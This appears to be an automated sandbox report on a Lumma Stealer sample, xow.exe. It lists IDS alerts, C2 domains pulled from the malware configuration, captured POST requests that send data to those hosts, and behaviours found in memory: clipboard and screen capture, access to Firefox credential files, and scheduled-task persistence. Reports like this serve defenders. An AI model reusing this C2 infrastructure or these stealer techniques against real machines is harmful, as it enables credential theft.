Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49733 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49731 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 104.21.78.5:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: pain-temper.bond
Source: Malware configuration extractor	URLs: crookedfoshe.bond
Source: Malware configuration extractor	URLs: stripedre-lot.bond
Source: Malware configuration extractor	URLs: immolatechallen.bond
Source: Malware configuration extractor	URLs: jarry-fixxer.bond
Source: Malware configuration extractor	URLs: longingfluffyr.cyou
Source: Malware configuration extractor	URLs: strivehelpeu.bond
Source: Malware configuration extractor	URLs: growthselec.bond
Source: Malware configuration extractor	URLs: jarry-deatile.bond

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.78.5:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 104.21.78.5:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: jarry-fixxer.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 46Host: jarry-fixxer.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=NE23V588HHSFGFNP2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18156Host: jarry-fixxer.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=604W9BUJBKV27J9X1TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8783Host: jarry-fixxer.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Y4ECS4S8YPTWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20400Host: jarry-fixxer.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I3M4RUPXRWRDUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2572Host: jarry-fixxer.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5O5EWST27SRODKZOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 587204Host: jarry-fixxer.bond
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 81Host: jarry-fixxer.bond

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: longingfluffyr.cyou
Source: global traffic	DNS traffic detected: DNS query: strivehelpeu.bond
Source: global traffic	DNS traffic detected: DNS query: crookedfoshe.bond
Source: global traffic	DNS traffic detected: DNS query: immolatechallen.bond
Source: global traffic	DNS traffic detected: DNS query: stripedre-lot.bond
Source: global traffic	DNS traffic detected: DNS query: growthselec.bond
Source: global traffic	DNS traffic detected: DNS query: jarry-deatile.bond
Source: global traffic	DNS traffic detected: DNS query: pain-temper.bond
Source: global traffic	DNS traffic detected: DNS query: jarry-fixxer.bond

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: jarry-fixxer.bond

Source: xow.exe, 00000001.00000002.1938561850.00000000008B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft.
Source: xow.exe, 00000000.00000002.1710337843.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://growthselec.bond:443/api
Source: xow.exe, 00000001.00000002.1938561850.00000000008B5000.00000004.00000020.00020000.00000000.sdmp, xow.exe, 00000001.00000002.1939889163.0000000003030000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond/
Source: xow.exe, 00000001.00000002.1939178246.000000000090A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond/D
Source: xow.exe, 00000001.00000002.1939178246.000000000090A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond/P
Source: xow.exe, 00000001.00000002.1938561850.000000000085C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond/api
Source: xow.exe, 00000001.00000002.1938561850.000000000085C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond/apiF
Source: xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond:443/api
Source: xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond:443/api4p.default-release/key4.dbPK
Source: xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond:443/apiS
Source: xow.exe, 00000001.00000002.1938561850.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://jarry-fixxer.bond:443/apiu
Source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp, xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.5:443 -> 192.168.2.4:49744 version: TLS 1.2

Source: C:\Users\user\Desktop\xow.exe

Code function: 1_2_00395450 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00395450

Source: C:\Users\user\Desktop\xow.exe

Code function: 1_2_00395450 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

1_2_00395450

Source: C:\Users\user\Desktop\xow.exe

Code function: 1_2_003955E0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

1_2_003955E0

Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657B4F8 NtProtectVirtualMemory,	0_2_0657B4F8
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657F1F0 NtResumeThread,	0_2_0657F1F0
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657B4F1 NtProtectVirtualMemory,	0_2_0657B4F1
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657F1E8 NtResumeThread,	0_2_0657F1E8

Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_02BECEB0	0_2_02BECEB0
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06226643	0_2_06226643
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06224CE0	0_2_06224CE0
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0622AB50	0_2_0622AB50
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062239E8	0_2_062239E8
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06224CD2	0_2_06224CD2
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0622BDE7	0_2_0622BDE7
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06220033	0_2_06220033
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06220040	0_2_06220040
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E0040	0_2_062E0040
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E1248	0_2_062E1248
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062E0367	0_2_062E0367
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062FE088	0_2_062FE088
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F8F09	0_2_062F8F09
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F8F18	0_2_062F8F18
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F9368	0_2_062F9368
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F6FA8	0_2_062F6FA8
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F6F9A	0_2_062F6F9A
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062FC420	0_2_062FC420
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F001F	0_2_062F001F
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F0040	0_2_062F0040
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062FC110	0_2_062FC110
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F79E3	0_2_062F79E3
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_062F79F0	0_2_062F79F0
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_063EF3B0	0_2_063EF3B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_063E001E	0_2_063E001E
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06578240	0_2_06578240
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657D078	0_2_0657D078
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06578230	0_2_06578230
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0657D06A	0_2_0657D06A
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0669F6E0	0_2_0669F6E0
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0669F9E8	0_2_0669F9E8
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_06680040	0_2_06680040
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0668003D	0_2_0668003D
Source: C:\Users\user\Desktop\xow.exe	Code function: 0_2_0669E588	0_2_0669E588
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003A08F0	1_2_003A08F0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003751B0	1_2_003751B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0036D9D4	1_2_0036D9D4
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003A11C0	1_2_003A11C0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00385200	1_2_00385200
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00370B55	1_2_00370B55
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003813B0	1_2_003813B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00399D10	1_2_00399D10
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00369585	1_2_00369585
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00387E50	1_2_00387E50
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038E6E0	1_2_0038E6E0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037F020	1_2_0037F020
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00385810	1_2_00385810
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003A0010	1_2_003A0010
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00378074	1_2_00378074
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038404D	1_2_0038404D
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039B040	1_2_0039B040
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0036A8B0	1_2_0036A8B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038D8BE	1_2_0038D8BE
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003A00B0	1_2_003A00B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003658A0	1_2_003658A0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037C090	1_2_0037C090
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00387890	1_2_00387890
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038F0FA	1_2_0038F0FA
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003638E0	1_2_003638E0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003768E1	1_2_003768E1
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037712E	1_2_0037712E
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00366100	1_2_00366100
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038A972	1_2_0038A972
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003A0140	1_2_003A0140
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039F1A2	1_2_0039F1A2
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038F181	1_2_0038F181
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00398180	1_2_00398180
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037D9F0	1_2_0037D9F0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003771DE	1_2_003771DE
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038F1CD	1_2_0038F1CD
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00395220	1_2_00395220
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039B223	1_2_0039B223
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0036CA1A	1_2_0036CA1A
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039BA0B	1_2_0039BA0B
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037CA70	1_2_0037CA70
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037827D	1_2_0037827D
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00389A60	1_2_00389A60
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00394244	1_2_00394244
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00364290	1_2_00364290
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037A290	1_2_0037A290
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038EA8C	1_2_0038EA8C
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039AA80	1_2_0039AA80
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003892FB	1_2_003892FB
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00381AD0	1_2_00381AD0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003751B0	1_2_003751B0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038831E	1_2_0038831E
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00385B7B	1_2_00385B7B
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00367370	1_2_00367370
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00398B8B	1_2_00398B8B
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00388B85	1_2_00388B85
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003993F0	1_2_003993F0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039FBE0	1_2_0039FBE0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00390BD7	1_2_00390BD7
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003913CB	1_2_003913CB
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00364BC0	1_2_00364BC0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003723C0	1_2_003723C0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037AC14	1_2_0037AC14
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038DC50	1_2_0038DC50
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00369440	1_2_00369440
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003A0C40	1_2_003A0C40
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003794D0	1_2_003794D0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00397D17	1_2_00397D17
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00365D60	1_2_00365D60
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0036AD40	1_2_0036AD40
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037D5A0	1_2_0037D5A0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039FDA0	1_2_0039FDA0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00366590	1_2_00366590
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038763A	1_2_0038763A
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0037CE39	1_2_0037CE39
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00386600	1_2_00386600
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00399650	1_2_00399650
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00362EA0	1_2_00362EA0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00392699	1_2_00392699
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039D690	1_2_0039D690
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003A0F00	1_2_003A0F00
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0039476B	1_2_0039476B
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00371F62	1_2_00371F62
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00394F40	1_2_00394F40
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00368FB0	1_2_00368FB0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_0038F7F0	1_2_0038F7F0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003717ED	1_2_003717ED
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_003747C0	1_2_003747C0
Source: C:\Users\user\Desktop\xow.exe	Code function: 1_2_00381FC0	1_2_00381FC0

Source: C:\Users\user\Desktop\xow.exe	Code function: String function: 003747B0 appears 104 times
Source: C:\Users\user\Desktop\xow.exe	Code function: String function: 00367F00 appears 40 times

Source: xow.exe, 00000000.00000002.1731319915.0000000005410000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGmvurilpfck.dll" vs xow.exe
Source: xow.exe, 00000000.00000002.1728368665.0000000003D3D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs xow.exe
Source: xow.exe, 00000000.00000002.1728368665.0000000003EFC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs xow.exe
Source: xow.exe, 00000000.00000002.1728368665.0000000003C75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs xow.exe
Source: xow.exe, 00000000.00000002.1710337843.00000000032BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs xow.exe
Source: xow.exe, 00000000.00000002.1709143472.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs xow.exe
Source: xow.exe, 00000000.00000002.1734839973.00000000064F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs xow.exe
Source: xow.exe, 00000000.00000002.1734276448.0000000006380000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs xow.exe
Source: xow.exe, 00000000.00000002.1710337843.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs xow.exe

Source: xow.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: xow.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: xow.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: xow.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: xow.exe, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, beqJPMuTha87cOwuRYs.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, beqJPMuTha87cOwuRYs.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, beqJPMuTha87cOwuRYs.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.xow.exe.41fb1a8.4.raw.unpack, beqJPMuTha87cOwuRYs.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.xow.exe.64f0000.10.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.xow.exe.64f0000.10.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.xow.exe.64f0000.10.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.xow.exe.64f0000.10.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.xow.exe.64f0000.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.xow.exe.3e35d40.3.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.xow.exe.64f0000.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
